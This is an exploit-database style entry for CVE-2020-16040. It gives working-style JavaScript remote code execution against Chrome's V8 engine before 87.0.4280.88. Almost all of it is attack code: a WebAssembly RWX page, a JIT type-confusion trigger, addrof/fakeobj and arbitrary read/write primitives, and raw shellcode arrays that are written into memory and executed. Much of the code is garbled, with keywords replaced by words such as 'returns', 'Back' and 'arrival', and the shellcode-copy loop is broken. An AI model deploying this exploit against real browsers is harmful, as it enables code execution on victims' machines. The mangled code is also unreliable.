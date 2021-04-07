



# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution # Exploit Creator: r4j0x00 # Version: < 87.0.4280.88 # Description: Due to insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88, a remote attacker could exploit heap corruption via a crafted HTML page. # CVE: CVE-2020-16040 / * BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. This software is provided by the copyright holders and contributors "as is" and any express or implied warranties, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall the copyright holder or contributors be liable for any direct, indirect, incidental, special, exemplary, or consequential damages (including, but not limited to, procurement of substitute goods or services; loss of use, data, or profits; or business interruption) however caused and on any theory of liability, whether in contract, strict liability, or tort (including negligence or otherwise) arising in any way out of the use of this software, even if advised of the possibility of such damage. 
* / // Reference: https: //faraz.faith/2021-01-07-cve-2020-16040-analysis/ var wasm_code = new Uint8Array ([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) Var wasm_mod = new WebAssembly.Module (wasm_code); var wasm_instance = new WebAssembly.Instance (wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer (8); var f64_buf = new Float64Array (buf); var u64_buf = new Uint32Array (buf); buf2 = new ArrayBuffer (0x150) ;. Function ftoi (val) {f64_buf[0] = val; BigInt (returns u64_buf)[0]) + (BigInt (u64_buf)[1])< 32n); }function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); returns f64_buf[0];} function foo (a) {var y = 0x7fffffff; if (a == NaN) y = NaN; if (a) y = -1; z = y +1. z >> = 31; z = 0x80000000-Math.sign (z | 1); if (a) z = 0; var arr = new Array (0-Math.sign (z)); arr.shift (); var cor = [1.1, 1.2, 1.3]; Return [arr, cor];} for (var i = 0; i <0x3000; ++ i) foo (true); var x = foo (false); var arr = x[0]var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; Function addrof (k) {arr[idx+1] = k; returns ftoi (cor[0]) & 0xffffffffn;} Function fakeobj (k) {cor[0] = itof (k); returns arrival[idx+1];} var float_array_map = ftoi (cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]var fake = fakeobj (addrof (arr2) + 0x20n); function arbread (addr) {if (addr% 2n == 0) {addr + = 1n;} arr2[1] = itof ((2n << 32n) + addr-8n); Back (Fake)[0]);} function arbwrite (addr, val) {if (addr% 2n == 0) {addr + = 1n;} arr2[1] = itof ((2n << 32n) + addr-8n); False[0] = itof (BigInt (val));} function copy_shellcode (addr, shellcode) {let dataview = new DataView (buf2); buf_addr = addrof (buf2); backing_store_addr = buf_addr + 0x14n; arbwrite (backing_store_addr, addr); for (let) i = 0; i[i], 
True);}} var rwx_page_addr = ftoi (arbread (addrof (wasm_instance) + 0x68n)); console.log ("[+] rwx page address: "+ rwx_page_addr.toString (16)); var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157]; / * var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; * / // Windows shellcode copy_shellcode (rwx_page_addr, shellcode); f ();



